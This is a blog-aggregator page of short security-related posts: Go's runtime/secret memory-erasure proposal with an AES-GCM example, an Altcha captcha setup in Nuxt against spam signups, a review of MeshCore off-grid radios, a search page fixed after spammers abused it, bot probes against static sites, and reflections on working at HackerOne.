Posts in Security (20 found)

Go proposal: Secret mode

Part of the Accepted! series, explaining the upcoming Go changes in simple terms. Automatically erase used memory to prevent secret leaks. Ver. 1.26 • Stdlib • Low impact

The new `runtime/secret` package lets you run a function in secret mode. After the function finishes, the runtime immediately erases (zeroes out) the registers and stack it used. Heap allocations made by the function are erased as soon as the garbage collector decides they are no longer reachable. This helps make sure sensitive information doesn't stay in memory longer than needed, lowering the risk of attackers getting to it. The package is experimental and is mainly for developers of cryptographic libraries, not for application developers.

Cryptographic protocols like WireGuard or TLS have a property called "forward secrecy": even if an attacker gains access to long-term secrets (like a private key in TLS), they shouldn't be able to decrypt past communication sessions. To make this work, session keys (used to encrypt and decrypt data during a specific communication session) need to be erased from memory after they're used. If there's no reliable way to clear this memory, the keys could stay there indefinitely, which would break forward secrecy.

In Go, the runtime manages memory, and it doesn't guarantee when or how memory is cleared. Sensitive data might remain in heap allocations or stack frames, potentially exposed in core dumps or through memory attacks. Developers often resort to unreliable reflection hacks to zero out internal buffers in cryptographic libraries, and even then some data might stay in memory where the developer can't reach or control it. The solution is to provide a runtime mechanism that automatically erases all temporary storage used during sensitive operations, making it easier for library developers to write secure code without workarounds.

The proposal adds the `runtime/secret` package, whose `Do` function runs the given function in secret mode. The current implementation has several limitations:

- Only supported on linux/amd64 and linux/arm64. On unsupported platforms, `Do` invokes the function directly.
- Protection does not cover any global variables that the function writes to.
- Trying to start a goroutine within `Do` causes a panic.
- If the function calls `runtime.Goexit`, erasure is delayed until all deferred functions are executed.
- Heap allocations are only erased if ➊ the program drops all references to them, and ➋ the garbage collector then notices that those references are gone. The program controls the first part, but the second depends on when the runtime decides to act.
- If the function panics, the panicked value might reference memory allocated inside `Do`. That memory won't be erased until (at least) the panicked value is no longer reachable.
- Pointer addresses might leak into data buffers that the runtime uses for garbage collection. Do not put confidential information into pointers.

The last point might not be immediately obvious, so here's an example. If an offset in an array is itself secret (say, the secret key always starts at some fixed index of a larger buffer), don't create a pointer to that location. Otherwise, the garbage collector might store this pointer, since it needs to know about all active pointers to do its job. If someone launches an attack to access the GC's memory, your secret offset could be exposed.

The package is mainly for developers who work on cryptographic libraries. Most apps should use higher-level libraries that use `runtime/secret` behind the scenes. As of Go 1.26, the package is experimental and can be enabled with a GOEXPERIMENT flag at build time.

Use `secret.Do` to generate a session key and encrypt a message using AES-GCM. Note that `secret.Do` protects not just the raw key, but also the cipher structure (which contains the expanded key schedule) created inside the function. This is a simplified example, of course: it only shows how memory erasure works, not a full cryptographic exchange. In real situations, the key needs to be shared securely with the receiver (for example, through key exchange) so decryption can work.

𝗣 21865 • 𝗖𝗟 704615 • 👥 Daniel Morsing, Dave Anderson, Filippo Valsorda, Jason A. Donenfeld, Keith Randall, Russ Cox
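For contrast, here is what the manual approach looks like in today's standard Go: generate a session key, encrypt with AES-GCM, then zero the raw key by hand. This is a sketch of the kind of workaround the secret-mode proposal is meant to replace (the function name is illustrative, not from the proposal). Note that the zeroing loop cannot wipe the expanded key schedule held inside the cipher value, which is exactly the gap secret mode closes.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
)

// sealWithEphemeralKey encrypts msg with a one-off AES-256-GCM session key,
// then zeroes the raw key bytes before returning. The wipe is best-effort:
// the expanded key schedule inside the cipher value stays on the heap until
// the garbage collector reclaims it, which is the problem secret mode solves.
func sealWithEphemeralKey(msg []byte) (nonce, ciphertext []byte, err error) {
	key := make([]byte, 32)
	if _, err := rand.Read(key); err != nil {
		return nil, nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, nil, err
	}
	nonce = make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, nil, err
	}
	ciphertext = gcm.Seal(nil, nonce, msg, nil)
	// Manual, best-effort erasure of the raw key material.
	for i := range key {
		key[i] = 0
	}
	return nonce, ciphertext, nil
}

func main() {
	nonce, ct, err := sealWithEphemeralKey([]byte("session data"))
	if err != nil {
		panic(err)
	}
	fmt.Printf("nonce: %x\nciphertext: %x\n", nonce, ct)
}
```

With `secret.Do`, the whole body of `sealWithEphemeralKey` would run inside the protected function, so the runtime, not the programmer, would be responsible for erasing the key, the cipher state, and every intermediate buffer.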

0 views
Jeff Geerling 6 days ago

Why doesn't Apple make a standalone Touch ID?

I finally upgraded to a mechanical keyboard. But because Apple's so protective of their Touch ID hardware, there aren't any mechanical keyboards with that feature built in. But there is a way to hack it. It's incredibly wasteful, and takes a bit more patience than I think most people have, but you basically take an Apple Magic Keyboard with Touch ID, rip out the Touch ID, and install it in a 3D printed box, along with the keyboard's logic board.

0 views
Hugo 1 week ago

Implementing a tracking-free captcha with Altcha and Nuxt

For the past few days, I've noticed several suspicious uses of my contact form. Looking closer, I noticed that each contact form submission was followed by a user signup with the same email and a name that always followed the same pattern: qSfDMiWAiLnpYYzdCeCWd, fePXzKXbAmiLAweNZ, etc. Let's just say their membership in the human species seems particularly dubious. Anyway, it's probably time to add some controls, and one of the most famous is the captcha.

## Next-generation captchas

Everyone knows captchas: they're annoying, probably on par with cookie consent banners. Nowadays we see captchas where you have to identify traffic lights, solve additions, drag a puzzle piece to the right spot, and so on. But you may have noticed that lately we're also seeing simple forms with a checkbox: "I am not a robot".

![I'm not a robot](https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1764749254941-124yicj.jpg)

Sometimes the captcha isn't even visible anymore, with detection happening without asking you anything. So how does it work? And how can I add it to my application?

## Nuxt Turnstile, the default solution with Nuxt

In the Nuxt ecosystem, the most common solution is [Nuxt Turnstile](https://nuxt.com/modules/turnstile). The documentation is pretty clear on how to add it. It's a great solution, but it relies on [Cloudflare Turnstile](https://nuxt.com/modules/turnstile), and I'm trying to use only European products for Writizzy and Hakanai. Still, the documentation helps you understand a bit better how next-generation captchas work. When the page loads, the Turnstile widget performs client-side checks:

- **Proof of space:** The script asks the client to generate and store an amount of data according to a predefined algorithm, then asks for the byte at a given position. Not only does this take time, but it's difficult to automate at scale.
- **Trivial browser detections:** The idea is to try to detect a bot (no plugins, webdriver control, etc.).
Fingerprinting also helps in this case. It collects all available info about the browser, OS, available APIs, resolution, etc. Note that fingerprinting can be frowned upon by GDPR, which may consider it as uniquely identifying a person. Personally, I find that debatable, but in the context of anti-spam protection we're kind of chasing our tail here, since we'd have to ask bots for permission to try to detect them. We're at the limits of absurdity. But let's continue.

The script then sends all this info to Cloudflare. Based on it, and relying on a huge database of worldwide traffic, Cloudflare calculates a percentage chance that the user is a bot. The form will vary between:

- nothing to do, Cloudflare is convinced it's a human
- a checkbox "I am not a robot"
- a more elaborate captcha if the suspicion is really strong
- a blocking page when there's no doubt about the suspicion

Now, you might say, the checkbox is a bit light, isn't it? If I've gotten this far, I can easily automate a click on a checkbox. Especially since Cloudflare is everywhere, it's necessarily the same form everywhere. Yes... But... First, the way you check the box will be analyzed. Is the click too fast, does it seem automated, is the mouse path to reach the box natural? All this can trigger additional protection.

*EDIT: Turnstile might not do this operation. reCAPTCHA, Google's solution, is known for doing it. Turnstile is less explicit on the subject.*

But on top of that, the checkbox triggers a challenge, a small calculation requested by Cloudflare that your client must perform. The result is what we call a **proof of work**. This work is slow for a computer: we're talking about 500ms, an eternity for a machine. For a human user, it's totally anecdotal. And the satisfaction of having proven their humanity makes you forget those 500 little milliseconds.
On the other hand, for a bot, this time will be a real problem if it needs to automate the creation of hundreds or thousands of accounts. So it's not impossible to check this box, but it's costly, and it's supposed to make the economic equation uninteresting at high volumes. Now, even though all this is nice, I still don't want to use Cloudflare, so how do I replace it?

## Altcha, an open-source alternative

During my research, I came across [altcha](https://altcha.org/). The solution is open source, requires no calls to external servers, and shares no data. The implementation requires requesting the proof of work (the famous JavaScript challenge) from your server. Here we'll initiate it from the Nuxt backend, in a handler:

```typescript
// server/api/altcha/challenge.get.ts
import { createChallenge } from 'altcha-lib'

export default defineEventHandler(async () => {
  const hmacKey = useRuntimeConfig().altchaHmacKey as string
  return createChallenge({
    hmacKey,
    maxnumber: 100000,
    expires: new Date(Date.now() + 60000) // 1 minute
  })
})
```

In the contact form page, we'll add a Vue component:

```vue
```

This `altchaPayload` will be added to the post payload, for example:

```typescript
await $fetch('/api/contact', {
  method: 'POST',
  body: {
    email: loggedIn.value ? user.value?.email : event.data.email,
    subject: event.data.subject,
    message: event.data.message,
    altcha: altchaPayload.value
  }
})
```

The calculation result will then be verified in the `/api/contact` endpoint:

```typescript
const hmacKey = useRuntimeConfig().altchaHmacKey as string
const ok = await verifySolution(data.altcha, hmacKey)
if (!ok) {
  throw createError({ statusCode: 400, message: 'Invalid challenge' })
}
```

The Vue component I mentioned earlier is this one:

```vue
```

And there you go, the [contact page](https://pulse.hakanai.io/contact) and the [signup page](https://pulse.hakanai.io/signup) are now protected by this altcha. Now, does it work?
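To make the proof-of-work step concrete, here is a minimal sketch of the idea (in Go rather than TypeScript, and not Altcha's actual wire format): the server hashes a salt plus a hidden number and sends only the salt and the hash; the client must brute-force the number, which is what costs CPU time. Conceptually, this is the work that `createChallenge` sets up and `verifySolution` checks.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"strconv"
)

// makeChallenge builds a puzzle: the server picks a secret number, hashes
// salt+number, and sends only (salt, hash, maxNumber) to the client.
func makeChallenge(salt string, secret int) string {
	sum := sha256.Sum256([]byte(salt + strconv.Itoa(secret)))
	return hex.EncodeToString(sum[:])
}

// solveChallenge brute-forces the number: the client hashes every candidate
// until one matches the challenge, which takes time proportional to the
// secret. Returns -1 if no candidate up to maxNumber matches.
func solveChallenge(salt, challenge string, maxNumber int) int {
	for n := 0; n <= maxNumber; n++ {
		sum := sha256.Sum256([]byte(salt + strconv.Itoa(n)))
		if hex.EncodeToString(sum[:]) == challenge {
			return n
		}
	}
	return -1
}

func main() {
	salt := "abc123"
	challenge := makeChallenge(salt, 74219)
	fmt.Println("solved:", solveChallenge(salt, challenge, 100000)) // prints "solved: 74219"
}
```

Verifying a submitted solution is cheap for the server (one hash), while finding it is expensive for the client, which is the whole point of the scheme.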
## Altcha's limitations

The implementation was done yesterday. And unfortunately, I'm still seeing very suspicious signups on Pulse. So clearly, Altcha didn't do its job. However, now that we know how it works, it's easier to understand why it doesn't work. Altcha doesn't do any of the checks that Turnstile does:

- no proof of space
- no fingerprinting
- no fingerprint verification with Cloudflare
- no behavioral verification of the mouse click on the checkbox

The only protection is the proof of work, which only costs the attacker time. Now for Pulse, for reasons I don't understand, the person having fun creating accounts makes about 4 per day. The cost of the proof of work is negligible in this case. So Altcha is not suited for this type of "slow attack". Anyway, I'll have to find another workaround... And I'm open to your suggestions.

0 views
Michael Lynch 1 week ago

My First Impressions of MeshCore Off-Grid Messaging

When my wife saw me playing with my new encrypted radio, she asked what it was for. “Imagine,” I said, “if I could type a message on my phone and send it to you, and the message would appear on your phone. Instantly!” She wasn’t impressed. “It also works if phone lines are down due to a power outage… or societal collapse.” Still nothing. “If we’re not within radio range of each other, we can route our messages through a mesh network of our neighbors’ radios. But don’t worry! The radios encrypt our messages end-to-end, so nobody else can read what we’re saying.” By this point, she’d left the room. My wife has many wonderful qualities, but, if I’m being honest, “enthusiasm for encrypted off-grid messaging” has never been one of them. The technology I was pitching to my wife was, of course, MeshCore. If you’d like to skip to the end, check out the summary. MeshCore is software that runs on inexpensive long-range (LoRa) radios. LoRa radios transmit up to several miles depending on how clear the path is. Unlike HAM radios, you don’t need a license to broadcast over LoRa frequencies in the US, so anyone can pick up a LoRa radio and start chatting. MeshCore is more than just sending messages over radio. The “mesh” in the name is because MeshCore users form a mesh network. If Alice wants to send a message to her friend Charlie, but Charlie’s out of range of her radio, she can route it through Bob, another MeshCore user who is within range of both, and Bob’s MeshCore radio will forward the message to Charlie. I’m not exactly a doomsday prepper, but I plan for realistic disaster scenarios like extended power outages, food shortages, and droughts. When I heard about MeshCore, I thought it would be neat to give some devices to friends nearby so we could communicate in an emergency.
And if it turned out that we’re out of radio range of each other, maybe I could convince a few neighbors to get involved as well. We could form a messaging network that’s robust against power failures and phone outages. MeshCore is a newer implementation of an idea that was popularized by a technology called Meshtastic. I first heard about Meshtastic from Tyler Cipriani’s 2022 blog post. I thought the idea sounded neat, but Tyler’s conclusion was that Meshtastic was too buggy and difficult for mainstream adoption at the time. I have no particular allegiance to MeshCore or Meshtastic, as I’ve never tried either. Some people I follow on Mastodon have been excited about MeshCore, so I thought I’d check it out. Most MeshCore-compatible devices are also compatible with Meshtastic, so I can easily experiment with one and later try the other. I only have a limited understanding of the differences between Meshtastic and MeshCore, but what I gather is that MeshCore’s key differentiator is preserving bandwidth. Apparently, Meshtastic hits scaling issues when many users are located close to each other. The Meshtastic protocol is chattier than MeshCore, so I’ve seen complaints that Meshtastic chatter floods the airwaves and interferes with message delivery. MeshCore attempts to solve that problem by minimizing network chatter. I should say at this point that I’m not a radio guy. It seems like many people in the LoRa community are radio enthusiasts who have experience with HAM radios or other types of radio broadcasting. I’m a tech-savvy software developer, but I know nothing about radio communication. If I have an incorrect mental model of radio transmission, that’s why. The MeshCore firmware runs on a couple dozen devices, but the official website recommends three devices in particular. The cheapest is the Heltec v3, the cheapest MeshCore-compatible device I could find at $27/ea, so I bought two.
I connected the Heltec v3 to my computer via the USB-C port and used the MeshCore web flasher to flash the latest firmware. I selected “Heltec v3” as my device, “Companion Bluetooth” as the mode, and “v1.9.0” as the version. I clicked “Erase device” since this was a fresh install. Then, I used the MeshCore web app to pair the Heltec with my phone over Bluetooth. Okay, I’ve paired my phone with my MeshCore device, but… now what? The app doesn’t help me out much in terms of onboarding. I try clicking “Map” to see if there are any other MeshCore users nearby. Okay, that’s a map of New Zealand. I live in the US, so that’s a bit surprising. Even if I explore the map, I don’t see any MeshCore activity anywhere, so I don’t know what the map is supposed to do. The map of New Zealand reminded me that different countries use different radio frequencies for LoRa, and if the app defaults to New Zealand’s location, it’s probably defaulting to New Zealand broadcast frequencies as well. I went to settings and saw fields for “Radio Settings,” and I clicked them expecting a dropdown, but it expects me to enter a number. And then I noticed a subtle “Choose Preset” button, which listed presets for different countries that were “suggested by the community.” I had no idea what any of them meant, but who am I to argue with the community? I chose “USA/Canada (Recommended).” I also noticed that the settings let me change my device name, so that seemed useful: It seemed like there were no other MeshCore users within range of me, which I expected. That’s why I bought the second Heltec. I repeated the process with an old phone and my second Heltec v3, but they couldn’t see each other. I eventually realized that I’d forgotten to configure my second device for the US frequency. This is another reason I wish the MeshCore app took initial onboarding more seriously. Okay, they finally see each other! They can both publish messages to the public channel. 
My devices could finally talk to each other over a public channel. If I communicate with friends over MeshCore, I don’t want to broadcast our whole conversation over the public channel, so it was time to test out direct messaging. I expected some way to view a contact in the public channel and send them a direct message, but I couldn’t. Clicking their name did nothing. There’s a “Participants” view, but the only option is to block, not send a direct message. This seems like an odd design choice. If a MeshCore user posts to the public channel, why can’t I talk to them? I eventually figured out that I have to “Advert.” There are three options: “Zero Hop,” “Flood Routed,” and “To Clipboard.” I don’t know what any of these mean, but I figure “flood” sounds kind of rude, whereas “Zero Hop” sounds elegant, so I do a “Zero Hop.” Great! Device 2 now sees device 1. Let’s say hi to Device 1 from Device 2. Whoops, what’s wrong? Maybe I need to “Advert” from Device 2 as well? Okay, I do, and voila! Messages now work. This is a frustrating user experience. If I have to advert from both ends, why did MeshCore let me send a message on a half-completed handshake? I’m assuming “Advert” is me announcing my device’s public key, but I don’t understand why that’s an explicit step I have to do ahead of time. Why can’t MeshCore do that implicitly when I post to a public channel or attempt to send someone a direct message? Anyway, I can talk to myself in both public channels and DMs. Onward! The Heltec v3 boards were a good way to experiment with MeshCore, but they’re impractical for real-world scenarios. They require their own power source, and a phone to pair. I wanted to power it from my phone with a USB-C to USB-C cable, but the Heltec board wouldn’t power up from my phone. In a real emergency, that’s too many points of failure. The MeshCore website recommends two other MeshCore-compatible devices, so I ordered those: the Seeed SenseCAP T-1000e ($40) and the Lilygo T-Deck+ ($100). 
I bought the Seeed SenseCAP T-1000e (left) and the Lilygo T-Deck+ (right) to continue experimenting with MeshCore. The T-1000e was a clear improvement over the Heltec v3. It’s self-contained and has its own battery and antenna, which feels simpler and more robust. It’s also nice and light. You could toss it into a backpack and not notice it’s there. The T-1000e feels like a more user-friendly product compared to the bare circuit board of the Heltec v3. Annoyingly, the T-1000e uses a custom USB cable for charging and flashing, so I can’t charge it or flash it from my computer with one of my standard USB cables. I used the web flasher for the Heltec, but I decided to try flashing the T-1000e directly from source. I use Nix, and the repo conveniently includes a Nix environment definition, so the dependencies installed automatically, and I flashed the T-1000e firmware from the command line. From there, I paired the T-1000e with my phone, and it was basically the same as using the Heltec. The only difference was that the T-1000e has no screen, so it falls back to a fixed default Bluetooth pairing password. Does that mean anyone within Bluetooth range can trivially take over my T-1000e and read all my messages? It also seems impossible to turn off the T-1000e, which is undesirable for a broadcasting device. The manufacturer advises users to just leave it unplugged for several days until the battery runs out. Update: MeshCore contributor Frieder Schrempf just fixed this in commit 07e7e2d, which is included in the v1.11.0 MeshCore firmware. You can now power off the device by holding down the button at the top of the T-1000e. Now it was time to test the Lilygo T-Deck. This was the part of MeshCore I’d been most excited about since the very beginning. If I handed my non-techy friends a device like the T-1000e, there were too many things that could go wrong in an actual emergency. “Oh, you don’t have the MeshCore app?
Oh, you’re having trouble pairing it with your phone? Oh, your phone battery is dead?” The T-Deck looked like a 2000s-era Blackberry. It seemed dead-simple to use because it was an all-in-one device: no phone pairing step or app to download. I wanted to buy a bunch and hand them out to my friends. If society collapsed and our city fell into chaos, we’d still be able to chat on our doomsday hacker Blackberries like it was 2005. As soon as I turned on my T-Deck, my berry was burst. This was not a Blackberry at all. As a reminder, this is what a Blackberry looked like in 2003. Before I even get to the T-Deck software experience, the hardware itself is so big and clunky. We can’t match the quality of a hardware product that we produced 22 years ago? Right off the bat, the T-Deck was a pain to use. You navigate the UI by clicking a flimsy little thumbwheel in the center of the device, but it’s temperamental and ignores half of my scrolls. Good news: there’s a touchscreen. But the touchscreen misses half my taps. There are three ways to “click” a UI element. You can click the trackball, push the “Enter” key, or tap the screen. Which one does a particular UI element expect? You just have to try all three to find out! I had a hard time even finding instructions for how to reflash the T-Deck+. I found a long Jeff Geerling video where he expresses frustration with how long it took him to find reflashing instructions… and then he never explains how he did it! I eventually worked out steps that worked for me (listed near the end of this post). Confusingly, there’s no indication that the device is in DFU mode. I guess the fact that the screen doesn’t load is sort of an indication. On my system, I also see logs indicating a connection. Once I figured out how to navigate the T-Deck, I tried messaging, and the experience remained baffling. For example, guess what screen I’m on here: What does this screen do?
If you guessed “chat on Public channel,” you’re a better guesser than I am, because the screen looks like nothing to me. Even when it displays chat messages, it only vaguely looks like a chat interface: Oh, it’s a chat UI. I encountered lots of other instances of confusing UX, but it’s too tedious to recount them all here. The tragic upshot for me is that this is not a device I’d rely on in an emergency. There are so many gotchas and dead-ends in the UX that would trip people up and prevent them from communicating with me. Even though the T-Deck broke my heart, I still hoped to use MeshCore with a different device. I needed to see how these devices worked in the real world rather than a few inches away from each other on my desk. First, I took my T-1000e to a friend’s house about a mile away and tried messaging the Heltec back in my home office. The transmission failed, as it seemed the two devices couldn’t see each other at all from that distance. Okay, fair enough. I’m in a suburban neighborhood, and there are lots of houses, trees, and cars between my house and my friend’s place. The next time I was riding in a car away from my house, I took along my T-1000e and tried messaging the Heltec v3 in my office. One block away: messages succeeded. Three blocks away: still working. Five blocks away: failure. And then I was never able to reach my home device until returning home later that day. Maybe the issue was the Heltec I kept leaving at home? I had read that the Heltec v3 has a particularly weak antenna, so I tried again, this time leaving my T-1000e at home and taking the T-Deck out with me. I could successfully message my T-1000e from about five blocks away, but everything beyond that failed. The other part of the MeshCore ecosystem I haven’t mentioned yet is repeaters, like the SenseCAP Solar P1-Pro, a solar-powered MeshCore repeater. MeshCore repeaters are like WiFi extenders: they receive MeshCore messages and re-broadcast them to extend their reach.
Repeaters are what create the “mesh” in MeshCore. The repeaters send messages to other repeaters and carry your MeshCore messages over longer distances. There are some technologically cool repeaters available. They’re solar powered with an internal battery, so they run independently and can survive a few days without sun. The problem was that I didn’t know how much difference a repeater makes. A repeater with a strong antenna would broadcast messages well, but does that solve my problem? If my T-Deck can’t send messages to my T-1000e from six blocks away, how is it going to reach the repeater? By this point, my enthusiasm for MeshCore had waned, and I didn’t want to spend another $100 and mount a broadcasting device to my house when I didn’t know how much it would improve my experience. MeshCore’s firmware is open-source, so I took a look to see if there was anything I could do to improve the user experience on the T-Deck. The first surprise with the source code was that there were no automated tests. I wrote simple unit tests, but nobody from the MeshCore team has responded to my proposal, and it’s been about two months. From casually browsing, the codebase feels messy but not outrageously so. It’s written in C++, and most of the classes have a large surface area with 20+ non-private functions and fields, but that’s what I see in a lot of embedded software projects. Another code smell: my unit test covers a small helper function that encodes raw bytes to a hex string, yet MeshCore’s implementation of it depends on headers from two crypto libraries, even though hex encoding has nothing to do with cryptography. It’s the kind of needless coupling MeshCore would avoid if they wrote unit tests for each component. My other petty gripe was that the code doesn’t have consistent style conventions.
Someone proposed using the formatter config file that’s already in the repo, but a maintainer closed the issue with the guidance, “Just make sure your own IDE isn’t making unnecessary changes when you do a commit.” Why? Why in 2025 do I have to think about where to place my curly braces to match the local style? Just set up a formatter so I don’t have to think about mundane style issues anymore. I originally started digging into the MeshCore source to understand the T-Deck UI, but I couldn’t find any code for it. I couldn’t find the source to the MeshCore Android or web apps either. And then, reading the MeshCore FAQ, I realized: it’s all closed-source. What!?! They’d advertised this as open-source! How could they trick me? And then I went back to the MeshCore website and realized they never say “open-source” anywhere. I must have dreamed the part where they advertised MeshCore as open-source. It just seems like such an open-source thing that I assumed it was. But I was severely disappointed to discover that critical parts of MeshCore are proprietary. Without open-source clients, MeshCore doesn’t work for me. I’m not an open-source zealot, and I think it’s fine for software to be proprietary, but the whole point of off-grid communication is decentralization and technology freedom, so I can’t get on board with a closed-source solution. Some parts of the MeshCore ecosystem are indeed open-source and liberally licensed, including the firmware I flashed to my Heltec v3 and T-1000e. But the T-Deck firmware, the web app, and the mobile apps (the clients I used to operate the radios) are all closed-source and proprietary. As far as I can see, there are no open-source MeshCore clients aside from the development CLI.
I still love the idea of MeshCore, but it doesn’t yet feel practical for communicating in an emergency. The software is too difficult to use, and I’ve been unable to send messages farther than five blocks (about 0.3 miles). I’m open to revisiting MeshCore, but I’m waiting on open-source clients and improvements in usability.

Reflashing the T-Deck+ (the steps that worked for me):

1. Disconnect the T-Deck from USB-C.
2. Power off the T-Deck.
3. Connect the T-Deck to your computer via the USB-C port.
4. Hold down the thumbwheel in the center.
5. Power on the device.

What I liked:

- It is incredibly cool to send text messages without relying on a big company’s infrastructure. The concept delights the part of my brain that enjoys disaster prep.
- MeshCore runs on a wide variety of low-cost devices, many of which also work for Meshtastic.
- There’s an active, enthusiastic community around it.

What I didn’t like:

- All of the official MeshCore clients are closed-source and proprietary.
- The user experience is too brittle for me to rely on in an emergency, especially if I’m trying to communicate with MeshCore beginners.
- Most of the hardware assumes you’ll pair it with your mobile phone over Bluetooth, which introduces many more points of failure and complexity.
- The only official standalone device is the T-Deck+, but I found it confusing and frustrating to use.
- There’s no written getting-started guide. There’s a FAQ, but it’s a hodgepodge of details without much organization. There’s a good unofficial intro video, but I prefer text documentation.

0 views
iDiallo 1 week ago

How I Became a Spam Vector

There are several reasons for Google to downrank a website from their search results. My first experience with downranking was on my very first day at a job in 2011. The day I walked into the building, Google released their first Panda update. My new employer, being a "content creator," disappeared from search results. This was a multi-million dollar company that had teams of writers and a portfolio of websites. They depended on Google, and not appearing in search meant we went on code red that first day. But it's not just large companies. Just this year, as AI Overview has dominated the search page, I've seen traffic to this blog falter. At one point, the number of impressions was increasing, yet the number of clicks declined. I mostly blamed it on AI Overview, but it didn't take long before impressions also dropped. It wasn't such a big deal to me, since the majority of my readers now come through RSS. Looking through my server logs, I noticed that web crawlers had been accessing my search page at an alarming rate. And the search terms were text promoting spammy websites: crypto, gambling, and even some phishing sites. That seemed odd to me. What's the point of searching for those terms on my website if it's not going to return anything? In fact, there was a bug on my search page: if you entered Unicode characters, the page returned a 500 error. I don't like errors, so I decided to fix it. You can now search for Unicode on my search page. Yay! But it didn't take long for traffic to my website to drop even further. I didn't immediately make the connection; I continued to blame AI Overview. That was until I saw the burst of bot traffic to the search page. What I didn't take into account was that now that my search page was working, any spammy search term you entered was prominently displayed on the page and in the page title. What I failed to see was that this made my search page a vector for spammers to post links to my website.
Even if those weren't actual anchor tags on the page, they were still URLs to spam websites. Looking through my logs, I can trace the sharp decline of traffic to this blog back to when I fixed the search page by adding support for Unicode. I didn't want to delete my search page, even though it primarily serves me for finding old posts. Instead, I added a single meta tag to fix the issue: What this means is that crawlers, like Google's indexing crawler, will not index the search page. Since the page is not indexed, the spammy content will not count toward the website's ranking. The result is that traffic has started to pick up once more. Now, I cannot say with complete certainty that this was both the cause of the traffic drop and the fix for it. I don't have data from Google. However, I can see the direct effect, and I can see through Google Search Console that the spammy search pages are being added to the "no index" issues section. If you are experiencing something similar with your blog, it's worth taking a look through your logs, specifically for search pages, to see if spammy content is being indirectly added. I started my career watching a content empire crumble under Google's algorithm changes, and here I am years later, accidentally turning my own blog into a spam vector while trying to improve it. The tools and tactics may have evolved, but some things never change. Google's search rankings are a delicate ecosystem, and even well-intentioned changes can have serious consequences. I often read about bloggers who never look past the content they write. Meaning, they don't care if you read it or not. But the problem comes when someone else takes advantage of your website's flaws. If you want to maintain control over your website, you have to monitor your traffic patterns and investigate anomalies. AI Overviews is most likely responsible for the original traffic drop, and I don't have much control over that.
But it was also a convenient scapegoat to blame everything on and an excuse not to look deeper. I'm glad at least that my fix was something simple that anyone can implement.
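For reference, the exact meta tag didn't survive in this copy of the post, but the fix described — telling crawlers not to index the search page — is conventionally done with the standard robots noindex directive in the page's head:

```html
<!-- Illustrative; the post doesn't show its exact tag -->
<meta name="robots" content="noindex">
```

With this in place, crawlers may still fetch the page, but they drop it from the index — which matches the "no index" entries the author saw appearing in Search Console.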

1 view
Jim Nielsen 1 week ago

Malicious Traffic and Static Sites

I wrote about the 404s I serve for robots.txt. Now it’s time to look at some of the other common 404s I serve across my static sites (as reported by Netlify’s analytics): I don’t run WordPress, but as you can see I still get a lot of requests for WordPress resources. All of my websites are basically just static files on disk, meaning only GET requests are handled (no POST, PUT, PATCH, etc.). And there’s no authentication anywhere. So when I see these requests, I think: “Sure is nice to have a static site where I don’t have to worry about server maintenance and security patches for all those resources.” Of course, that doesn’t mean running a static site protects me from being exploited by malicious, vulnerability-seeking traffic. Here are a few more common requests I’m serving a 404 to: With all the magic building and bundling we do as an industry, I can see how easy it would be for some sensitive data in your source repo (like the files above) to end up in your build output. No wonder there are bots scanning the web for these common files! So be careful out there. Just because you’ve got a static site doesn’t mean you’ve got no security concerns. Fewer, perhaps, but not none. Reply via: Email · Mastodon · Bluesky

0 views
devansh 1 week ago

Reflections on my 5 years at HackerOne

Today marks 5 years at HackerOne for me. I joined in 2020 as a Product Security Analyst while I was still an undergrad student. I’m grateful to now be serving as a Team Lead (Technical Services). A few reflections: Grateful for the people at HackerOne who took chances on me, challenged my thinking, and trusted me with more responsibility than I thought I was ready for. An even bigger thanks to the hackers whose reports I’ve had the chance to read over all these years. Five years in, still learning, still a work in progress :)

- None of this is solo. Good managers, patient teammates, and sharp hackers did more for my growth than any “self-made” narrative.
- Title changes are visible; real growth is not. It’s in how you listen, decide, and own mistakes.
- Luck is underrated. Being in a high-trust, high-talent environment at the right time matters more than we admit.
- "I don’t know" is not a weakness. It’s usually the start of the right conversation.
- As an individual contributor, you optimize for being right. As a lead, you optimize for the team being effective. Very different job.
- Escalations and incidents expose culture fast. Blame travels down; responsibility travels up.
- Saying "no" clearly is kinder than saying "yes" and disappearing.
- Tools change every year. Principles - ownership, clarity, curiosity - don’t.
- If you stop learning, your experience is just 1 year repeated 5 times.
- Constraints are not excuses, they are design inputs for how you grow.
- Reading reports from hackers is a privilege, a free, continuous education from some of the sharpest minds on the internet.
- The hardest shift is from “How do I prove myself?” to “How do I make others successful?”.
- Calm execution during chaos beats heroic last-minute rescue every single time.
- Depth compounds. Understanding one concept end-to-end teaches you more than skimming ten.
- Feedback that makes you uncomfortable is usually the feedback you needed two months ago.
- High standards without empathy create fear. Empathy without standards creates mediocrity. You need both.
- You outgrow roles faster than you outgrow habits. Updating your habits is the real promotion.
- If everything is urgent, nothing is important. Prioritization is a leadership skill, not a calendar trick.
- Writing forces clarity. If you can’t explain it simply, you probably don’t understand it yet.
- Most “communication issues” are unasked questions and unspoken assumptions.
- Systems outlive heroes. Fix the system, don’t search for a savior.
- Being technically right and practically useless is still a miss.
- A 1% better process, repeated daily, beats a once-a-year “big transformation”.
- You can borrow context, but you can’t outsource judgment. That part you have to earn.
- Your manager sees some of the picture. Customers see another part. Hackers see yet another. Listen to all three.
- Imposter syndrome never fully leaves. You just learn to move with it instead of freezing because of it.
- Generosity with knowledge is not optional. Someone did it for you when you had nothing to trade.
- Gratitude is a strategy, not just a feeling. It keeps you curious, grounded, and willing to start at zero again.
- Stay hungry, very very hungry. The real hunger for growth can’t be fully satisfied; the moment it feels “enough,” it was never true hunger. The goalpost should keep moving, not out of insecurity, but out of a genuine desire to keep stretching what you can learn, build, and contribute.

0 views
fLaMEd fury 1 week ago

Contain The Web With Firefox Containers

